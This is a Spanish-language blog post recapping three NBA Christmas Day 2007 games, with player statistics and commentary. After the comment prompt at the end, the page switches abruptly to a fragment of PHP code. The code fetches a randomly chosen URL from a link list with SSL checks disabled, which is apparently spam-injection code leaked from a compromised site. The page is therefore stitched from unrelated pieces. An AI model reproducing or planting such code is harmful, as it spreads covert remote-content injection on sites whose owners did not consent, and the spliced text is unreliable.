La crónica (25/12/07)

26 de December de 2007 por telekoman

Como todos los años, el Día de Navidad nos ha dejado buenos partidos. En esta ocasión han sido 3 partidos en los que ha habido de todo. El partido de los venidos a menos, con Cleveland y Miami intentando salir de la crisis, tanto de juego como de resultados. El partidazo de la jornada entre Suns y Lakers, saldado con la victoria de los de los Angeles que se afianzan en su puesto de Playoff gracias a Kobe y a un gran Andrew Bynum. Y el partido que debía ser la lucha por el ROY entre Oden y Durant y que ha supuesto la prolongación de la racha de Portland a 11 victorias, … y eso sin Oden.

 


Heat 82 – Cavaliers 96

Duelo de equipos venidos a menos en el día de Navidad. Santa Claus ha traído a los fans de Cleveland una cómoda victoria sobre unos Heat que siguen sin encontrar su juego y que acumulan ya la nada despreciable cifra de 20 derrotas, el peor record del Este, y el segundo de toda la NBA. En los Cavaliers destacó el de siempre. LeBron anotó 25 puntos, repartió 12 asistencias, capturó 5 rebotes y estuvo a punto de perder algún diente en un choque con Shaq. Larry Hughes volvió a la titularidad en un intento de reeditar los laureles de la temporada pasada. No estuvo bien en la faceta anotadora, con tan sólo 4 puntos, pero consiguió parar relativamente a Wade, lo que aumentó mucho las posibilidades de victoria de su equipo. Otros 4 jugadores estuvieron por encima de los 13 puntos gracias a la suave defensa de Miami. Para los pupilos de Pat Riley hubo malas y no tan malas noticias. La malas se tradujeron en una nueva derrota, en que de nuevo sólo 3 jugadores estuvieron por encima de 10 puntos y en que de nuevo la posición de base estuvo bastante desguarnecida, lo que se puede ver en que el número de pérdidas, 18, supera a las asistencias, 16. Las menos malas hay que buscarlas en los pequeños detalles. Shaq no fue expulsado por faltas tras 5 partidos consecutivos en los que no consiguió terminar el partido. Haslem sigue estando fuerte en la defensa de su aro, pero no en el del rival. Y … , bueno, la verdad es que poco más.

Suns 115 – Lakers 122


Impresionante partido el vivido en el Staples Center de Los Angeles, entre dos equipos con cuentas que saldar durante esta temporada tras los pasados Playoffs. El partido fue vibrante, con distancias siempre mínimas y con un par de jugadores omnipresentes. Kobe Bryant y Andrew Bynum. Tras proclamarse jugador más joven de la historia en alcanzar 20.000 puntos, Kobe Bryant vuelve a asomar la nariz en el libro de las estadísticas al situarse en el puesto 30 de la lista de máximos anotadores desplazando a Tom Chambers gracias a los 38 puntos anotados ayer. Todo un lujo para nuestros ojos. Y Bynum, para muchos uno de los mejores centers de la actualidad, tuvo su noche de gloria tras situar su mejor marca personal en 28 puntos, a los que sumó 12 rebotes y lo que es quizás más importante, dejando a Amare Stoudemire en sólo 6 rebotes. Bynum está siendo sin duda el mejor regalo que Kobe podría desear para Navidad en su afán por volver a conseguir el anillo. Junto a ellos dos, el resto del quinteto titular, Fisher, Odom y Ariza, también cuajó una gran actuación, anotando todos más de 14 puntos y con Odom capturando 14 rebotes para ser el máximo reboteador del partido. Y por parte de los Suns casi todo el equipo estuvo a buen nivel, con 7 de los 8 jugadores que participaron con 10 o más puntos, encabezados por Nash que consiguió 24 puntos y 14 asistencias.

 

Sonics 79 – Trail blazers 89


Cuando la NBA montó el calendario de la presente temporada, reservó uno de los 3 partidos del día de Navidad para el enfrentamiento entre Greg Oden y Kevin Durant, números 1y 2 del draft respectivamente. Pero la lesión de larga duración de Odem frustró ese enfrentamiento. Sin embargo los espectadores que pudieran ver en directo el encuentro en el Rose Garden de Portland y todos aquellos que lo vieran por televisión no habrás quedado defraudados. Portland, pese a ser el equipo más joven de la NBA, está haciendo uno de los mejores juegos de la liga y esto se puede comprobar fácilmente viendo la racha de victorias consecutivas, 11. Esta racha es la más larga en la actualidad y se acerca a las 12 victorias consecutivas de la temporada 2001 – 2002 y a las 16 de su mejor racha de la historia durante la 90 – 91. Tras un primer cuarto con excesivos nervios, el equipo de Portland fue cogiendo el tono, ganando los 3 cuartos restantes y dejando al final una diferencia de 10 puntos en el marcador. De nuevo Brandon Roy volvió a ser el mejor jugador de su equipo con 17 puntos, los mismos que Jack, a los que añadió 6 rebotes y 7 asistencias. Esta vez no contó con la aportación anotadora de Aldridge, pero no hizo falta ya que el resto del equipo cumplió. Destacar los 16 rebotes capturados por Pryzbilla, lo que supone su mejor marca personal. Por parte de Seattle, tan sólo Durant con 22 puntos y Szczerbiak con 19 destacaron en la faceta anotadora, con 11 asistencias de Watson, 10 rebotes de Thomas y 14 de Collison.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>